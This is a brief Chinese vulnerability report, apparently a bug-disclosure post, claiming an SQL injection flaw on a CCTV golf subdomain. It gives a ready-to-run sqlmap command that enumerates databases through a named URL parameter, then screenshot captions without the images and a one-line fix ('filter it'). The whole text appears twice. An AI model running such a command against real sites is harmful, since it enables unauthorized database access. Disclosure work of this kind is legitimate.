中国网络电视台SQL注入漏洞中国网络电视台SQL注射漏洞
用sqlmap跑了一下,其他啥也没做。
sqlmap -u "http://golf.cctv.com/function/2013gold_court/courtlist.php?area=q" --dbs
看图:
继续:
fungolf表:
修复方案:
过滤一下。
中国网络电视台SQL注入漏洞中国网络电视台SQL注射漏洞
用sqlmap跑了一下,其他啥也没做。
sqlmap -u "http://golf.cctv.com/function/2013gold_court/courtlist.php?area=q" --dbs
看图:
继续:
fungolf表:
过滤一下。